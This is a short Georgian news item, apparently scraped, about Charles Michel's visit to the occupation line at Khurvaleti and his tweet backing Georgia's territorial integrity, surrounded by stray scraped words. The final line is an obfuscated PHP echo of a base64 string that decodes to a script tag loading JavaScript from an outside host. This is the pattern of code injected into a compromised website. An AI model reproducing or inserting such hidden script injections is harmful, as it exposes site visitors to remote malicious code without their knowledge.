celsiusi
ავერსი საქკაბელი
ევროკავშირი მხარს უჭერს საქართველოს სუვერენიტეტსა და ტერიტორიულ მთლიანობას, - ამის შესახებ საქართველოში ევროპული საბჭოს პრეზიდენტმა შარლ მიშელმა განაცხადა, რომელიც ცოტა ხნის წინ სოფელ ხურვალეთში საოკუპაციო ხაზთან არსებულ ვითარებას გაეცნო.
 
„მავთულხლართებით ორად გაყოფილი სოფელი. ადმინისტრაციული საზღვრის ხაზი ჯერ კიდევ სასტიკი რეალობაა მოქალაქეებისთვის 2008 წლის ომის შემდეგ. ეს უნდა შეიცვალოს. ევროკავშირი მხარს უჭერს საქართველოს სუვერენიტეტსა და ტერიტორიულ მთლიანობას,“- წერს შარლ მიშელი სოციალურ ქსელ „ტვიტერში“.
1352
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");